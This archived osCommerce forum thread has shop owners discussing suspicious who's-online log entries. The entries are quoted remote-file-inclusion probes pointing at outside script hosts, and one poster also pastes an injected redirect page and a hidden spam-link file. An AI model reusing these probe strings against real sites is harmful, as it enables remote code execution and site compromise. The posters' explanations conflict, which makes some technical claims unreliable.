♥monte22 Posted March 16, 2008 Posted March 16, 2008 I've noticed the last week or in the who's online page, that I have had some strange links in the "last url" section. Things like: /index.php?cPath=http://thepotparty.eclub.lv/images? /index.php?cPath=http://turiusisjsuisnsi.chat.ru/html/body? /index.php?cPath=http://luckpotparty.eclub.lv/images? /index.php?cPath=http://turiusisjsuisnsi.chat.ru/html/body? and a handful of others that are similar. The second half of the link leads to some type of script, that I have no idea what it does. I my site is setup so that register_globals is turned off, but I'd like to know if there is any other harm that could come. Also, each "visitor" has a different ip address, so I really don't know who is attempting to execute these scripts. Anyone else with a similar experience?
Guest Posted March 17, 2008 Posted March 17, 2008 I've noticed the last week or in the who's online page, that I have had some strange links in the "last url" section. Things like: /index.php?cPath=http://thepotparty.eclub.lv/images? /index.php?cPath=http://turiusisjsuisnsi.chat.ru/html/body? /index.php?cPath=http://luckpotparty.eclub.lv/images? /index.php?cPath=http://turiusisjsuisnsi.chat.ru/html/body? and a handful of others that are similar. The second half of the link leads to some type of script, that I have no idea what it does. I my site is setup so that register_globals is turned off, but I'd like to know if there is any other harm that could come. Also, each "visitor" has a different ip address, so I really don't know who is attempting to execute these scripts. Anyone else with a similar experience? Probably probing for weakness.
Softtail3005 Posted March 17, 2008 Posted March 17, 2008 I've noticed the last week or in the who's online page, that I have had some strange links in the "last url" section. Things like: /index.php?cPath=http://thepotparty.eclub.lv/images? /index.php?cPath=http://turiusisjsuisnsi.chat.ru/html/body? /index.php?cPath=http://luckpotparty.eclub.lv/images? /index.php?cPath=http://turiusisjsuisnsi.chat.ru/html/body? and a handful of others that are similar. The second half of the link leads to some type of script, that I have no idea what it does. I my site is setup so that register_globals is turned off, but I'd like to know if there is any other harm that could come. Also, each "visitor" has a different ip address, so I really don't know who is attempting to execute these scripts. Anyone else with a similar experience? I just got the same thing that you got, last night and today, while looking at "Who is on line". Last night I checked all the program files and nothing was unusual. If I discover anything I will advise, please do likewise. All the ones I received were../index.php?cPath=http://thepotparty.eclub.lv/images? but were tied to different ip addresses.
♥monte22 Posted March 17, 2008 Author Posted March 17, 2008 I just got the same thing that you got, last night and today, while looking at "Who is on line".Last night I checked all the program files and nothing was unusual. If I discover anything I will advise, please do likewise. All the ones I received were../index.php?cPath=http://thepotparty.eclub.lv/images? but were tied to different ip addresses. If your site is setup so that register_globals is set to on, you may be in trouble. Register_globals allow for the execution of scripts in this manner. I'd install the contrib below if you haven't already. http://addons.oscommerce.com/info/2097 James
Guest Posted March 19, 2008 Posted March 19, 2008 I too have found very similar stuff on my website through the who's online function. These are the few that i have caught: /catalog/index.php?body=http://www.rangersales.com/images/can? /catalog/index.php?goto=http://www.hagenclauss.de//vwar/convert/.r/bush?? /catalog/index.php?go=http://12.30.229.109/images/.../di?? does anyone know exactly what this is doing? I entered the URL's in and saw my website exactly as it should look like but with the above url extensions? does this mean that particular page is being shown from another server or something like that? I checked the IP's and they are from bulgaria, US and Italy. Does anyone know where to find the weakness? I have found a couple of strange files in my root directory they are: redir.html File Type: HTML document text <html> <head> <META http-equiv="refresh" content="0;URL=http://sugaronly.com/"> </head> <body> </body> </html> ftp_info.php with a huge amount of redirects loaded in it. It went on like this: <!--uFGe2KWGKi|1198713603--><spam style=display:none><a href='http://exclusive-mp3.com/' title='mp3 download'>mp3 download</a><a href='http://exclusive-mp3.com/genres/' title='mp3 downloads'>mp3 downloads</a><a href='http://exclusive-mp3.com/topcharts/' title='leona lewis'>leona lewis</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/levitra.html' title='levitra'>levitra</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/levitra-online.html' title='levitra online'>levitra online</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/buy-levitra.html' title='buy levitra'>buy levitra</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/buy-levitra-online.html' title='buy levitra online'>buy levitra online</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/order-levitra.html' title='order levitra'>order levitra</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/order-levitra-online.html' title='order levitra online'>order levitra online</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/discount-levitra.html' You don't notice how long this file is because all of the information is on one line only and until you copy and paste it out you don't see the rest. I have deleted this but not sure if this is the only one? my register globals was on in my php.ini file. any solutions out there?
♥monte22 Posted March 19, 2008 Author Posted March 19, 2008 When a url such as: /catalog/index.php?body=http://www.rangersales.com/images/can? is accessed and you have register_globals ON, the script which is located at: http://www.rangersales.com/images/can? is executed on your site! Usually these scripts are designed to extract data from people who visit the site. Injected code similar to the one above is a way to do that. The simplest solution is to install the register_globals contribution at: http://addons.oscommerce.com/info/2097 This will allow you to operate your site with register_globals OFF! We have a highly modified shop, and installing the contribution did not break a single function. Very happy. I think I read that in RC2 or RC2a that register_globals can be off as well, but don't quote me on that. James
Softtail3005 Posted March 19, 2008 Posted March 19, 2008 When a url such as: /catalog/index.php?body=http://www.rangersales.com/images/can? is accessed and you have register_globals ON, the script which is located at: http://www.rangersales.com/images/can? is executed on your site! Usually these scripts are designed to extract data from people who visit the site. Injected code similar to the one above is a way to do that. The simplest solution is to install the register_globals contribution at: http://addons.oscommerce.com/info/2097 This will allow you to operate your site with register_globals OFF! We have a highly modified shop, and installing the contribution did not break a single function. Very happy. I think I read that in RC2 or RC2a that register_globals can be off as well, but don't quote me on that. James Hi James, I noticed in your original post that you said that your register_globals was turned off, were you getting these strange links even with it turned off? My hosting site turns off registered globals and I am getting these weird links, mine are from Latvia or Russia, the Latvia site is thepotparty.eclub.lv and is a free hosting site in Latvia. I have gone into my site and done a view source and can not see anything strange in the code even with these links on my sites. I also can not understand how they get so many unique ip addresses. I still can not figure out what this code is for, if I log in with the complete path (thepotparty...) and look at the page source that is executing, I can not see it doing anything harmful. Still do not know the purpose of the link. Thanks jon
♥monte22 Posted March 19, 2008 Author Posted March 19, 2008 Hi James, I noticed in your original post that you said that your register_globals was turned off, were you getting these strange links even with it turned off? My hosting site turns off registered globals and I am getting these weird links, mine are from Latvia or Russia, the Latvia site is thepotparty.eclub.lv and is a free hosting site in Latvia. I have gone into my site and done a view source and can not see anything strange in the code even with these links on my sites. I also can not understand how they get so many unique ip addresses. I still can not figure out what this code is for, if I log in with the complete path (thepotparty...) and look at the page source that is executing, I can not see it doing anything harmful. Still do not know the purpose of the link. Thanks jon I started noticing them last week, I did some digging and found out all the reasons I should have a site that is not dependent on register_globals. Last Saturday I used the contribution above to allow for register_globals to be turned out. Since then I have not seen these links in whos_online. I'm not sure what they are trying to do either, but the only person I want executing scripts on my site is me. :) A few thoughts on how they get so many unique ip addresses: 1. Link is contained in spam email, then is clicked by by receiver. 2. Link is submitted to search engine for submission, then is automatically spidered by the search engine computer. 3. Link is posted on some forum or anywhere where someone could click it. It doesn't necessarily have to be the hacker who is executing the script, so blocking these IP addresses wont help. Below is a link to an article that talks about 5 common website vulnerabilities. register_globals is #1 http://www.securityfocus.com/infocus/1864 James
Softtail3005 Posted March 20, 2008 Posted March 20, 2008 I started noticing them last week, I did some digging and found out all the reasons I should have a site that is not dependent on register_globals. Last Saturday I used the contribution above to allow for register_globals to be turned out. Since then I have not seen these links in whos_online. I'm not sure what they are trying to do either, but the only person I want executing scripts on my site is me. :) A few thoughts on how they get so many unique ip addresses: 1. Link is contained in spam email, then is clicked by by receiver. 2. Link is submitted to search engine for submission, then is automatically spidered by the search engine computer. 3. Link is posted on some forum or anywhere where someone could click it. It doesn't necessarily have to be the hacker who is executing the script, so blocking these IP addresses wont help. Below is a link to an article that talks about 5 common website vulnerabilities. register_globals is #1 http://www.securityfocus.com/infocus/1864 James Thanks James, I am going to put the patches in today. Jon
♥Vger Posted March 20, 2008 Posted March 20, 2008 This has absolutely nothing whatsoever to do with Register Globals. That's a complete and utter load of nonsense. You can test it for yourself quite simply by copying one of the attempts to redirect and copying it into your browser. If it works and it takes you somewhere else other than your website then you have a problem with security on your site - if it goes to your site only, perhaps throwing a 404 error or perhaps not, then you don't have a problem. What the first poster was seeing was an attempt to exploit an open redirect script - to find if it is available. Provided you are using a version of osCommerce from later than 2005 that loophole is plugged. In Maree's case her whole site has been exploited, and you don't get to be able to upload new files because Register Globals is on in php.ini. Either someone has her User Name and Password and misused them, or she left her admin folder open, or the server was exploited and they got in via an insecure root on the server (cPanel is vulnerable to this). Vger
Softtail3005 Posted March 20, 2008 Posted March 20, 2008 This has absolutely nothing whatsoever to do with Register Globals. That's a complete and utter load of nonsense. You can test it for yourself quite simply by copying one of the attempts to redirect and copying it into your browser. If it works and it takes you somewhere else other than your website then you have a problem with security on your site - if it goes to your site only, perhaps throwing a 404 error or perhaps not, then you don't have a problem. What the first poster was seeing was an attempt to exploit an open redirect script - to find if it is available. Provided you are using a version of osCommerce from later than 2005 that loophole is plugged. In Maree's case her whole site has been exploited, and you don't get to be able to upload new files because Register Globals is on in php.ini. Either someone has her User Name and Password and misused them, or she left her admin folder open, or the server was exploited and they got in via an insecure root on the server (cPanel is vulnerable to this). Vger So just what is this? If I do a who's on line I get about 20-50 of the following: /store/index.php?language=http://myweddingphotos.by.ru/images? /store/index.php?language=http://myweddingphotos.by.ru/images? /store/index.php?cPath=http://myweddingphotos.by.ru/images? /store/index.php?language=http://myweddingphotos.by.ru/images? most with different ip addresses. I have followed the path and it just displays my own web page. Global registered variables are off and I have the Richard Bentley Patchs installed. I do not notice any real problems on my web site, maybe increased bandwidth but that is all. Has anybody got a n idea on what this is trying to accomplish and why. Thanks Jon
♥monte22 Posted March 20, 2008 Author Posted March 20, 2008 This has absolutely nothing whatsoever to do with Register Globals. That's a complete and utter load of nonsense. You can test it for yourself quite simply by copying one of the attempts to redirect and copying it into your browser. If it works and it takes you somewhere else other than your website then you have a problem with security on your site - if it goes to your site only, perhaps throwing a 404 error or perhaps not, then you don't have a problem. What the first poster was seeing was an attempt to exploit an open redirect script - to find if it is available. Provided you are using a version of osCommerce from later than 2005 that loophole is plugged. In Maree's case her whole site has been exploited, and you don't get to be able to upload new files because Register Globals is on in php.ini. Either someone has her User Name and Password and misused them, or she left her admin folder open, or the server was exploited and they got in via an insecure root on the server (cPanel is vulnerable to this). Vger So are you saying having register_globals enabled no security risks? Whatever script these people are trying to execute, redirect or not, having register_globals on opens the door for them. Am I saying that once you install the patch, that automatically there will be no more attempts? No, but in my experience, since i installed the patch, I have not seen the links the handful of times I have checked. Correlation or causation? Hard to tell. Having a site that isn't reliant on register_globals is MORE secure that a site that is.
♥Vger Posted March 21, 2008 Posted March 21, 2008 Register Globals is only one factor in site security, but to listen to some people talk it's the only thing. Every day I see sites hacked on other people's servers with programmes which run with Register Globals off. The two most dangerous things to site security at the moment? 1. cPanel - no jailed root and regularly gets exploited 2. Outdated versions of phpBB. The mass mailer is an all-you-can-eat buffet for spammers. Not limited to phpBB but it's the target simply because it's the most widely used. The only time I have seen the exploit posted above being successful on osCommerce (with Register Globals 'on') was with the 2003-2005 version where the redirect.php file did not check that the added url was coming from within your site. Vger
♥Vger Posted March 21, 2008 Posted March 21, 2008 I have followed the path and it just displays my own web page. Then you don't have a problem. These attempts happen on all kinds of website every single day. It's just hackers looking to exploit vulnerabilities. They're not even targetting you. They use automated programmes. Vger
♥monte22 Posted March 21, 2008 Author Posted March 21, 2008 Register Globals is only one factor in site security, but to listen to some people talk it's the only thing. Every day I see sites hacked on other people's servers with programmes which run with Register Globals off. The two most dangerous things to site security at the moment? 1. cPanel - no jailed root and regularly gets exploited 2. Outdated versions of phpBB. The mass mailer is an all-you-can-eat buffet for spammers. Not limited to phpBB but it's the target simply because it's the most widely used. The only time I have seen the exploit posted above being successful on osCommerce (with Register Globals 'on') was with the 2003-2005 version where the redirect.php file did not check that the added url was coming from within your site. Vger Yes, there are a million ways to hack a site with register_globals on or off. The point of this post was not to solve every single problem, but to share my experience. One day I noticed strange links on the whos online page. I didn't know what they were. I did some digging and found that having register globals enables allows for the executing of some scripts in the same manner as I saw in the links on the who online page. I found and installed a register globals patch. In MY case, the strange links disappeared from the whos online page. These links may or may be causing any harm to the site or its visitors. My point is closing one large door on outside sources ability to execute scripts is an improvement. Not 100% hacker proof, but better. James
GemRock Posted March 21, 2008 Posted March 21, 2008 ... Not 100% hacker proof, but better... Not as far as osc is concerned - it makes little difference on a given server. Ken commercial support - unProtected channel, not to be confused with the forum with same name - open to everyone who need some professional help: either PM/email me, or go to my website (URL can be found in my profile). over 20 years of computer programming experience.
♥Vger Posted March 21, 2008 Posted March 21, 2008 Given how widely used it is osCommerce has been relatively free of hacks when compared to other popular PHP based programmes. The hacks which caused most problems were the Open Redirect (plugged) and the Contact Us form exploit (plugged). If you have Register Globals 'off' but are unfortunate enough to be using a version of cPanel which is out of date then the hackers can get directly into the server, or into your site from another site they've hacked on the same server, because cPanel has no jailed root for each website. So if they get into one site they can get into all other sites as well. I mention cPanel specifically because: 1. It is the most widely used and popular control panel and therefore the greatest target for hackers, who do manage to find new exploits between 2 and 4 times a year. If another type of control panel were the most widely used and popular then perhaps they'd have the sort of problems cPanel does. Though I personally doubt this because I think the major problem with cPanel is structural. 2. There are many small hosts out there who self-manage their servers and use cPanel but because of their inexperience and cost-cutting fail to keep it updated with all of the latest security fixes and patches. 3. Although I have come across many exploits of cPanel over the past years I have yet to come across a major exploit of either Ensim or Plesk control panels. 4. We use Ensim Pro X on our servers, running in High Security mode, with each website having its own jailed root and its own php.ini file which allows the site owner to run with Register Globals 'on' or 'off'. We've not had an exploit of an osCommerce website running with Register Globals 'on' in 3 years, provided the version of osCommerce they use is from 2005 onwards. And the hackers do try - we see that from the error logs. What I'm sayng is that server security is far more important than whether an osCommerce website runs with Register Globals 'on' or 'off'. Vger
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.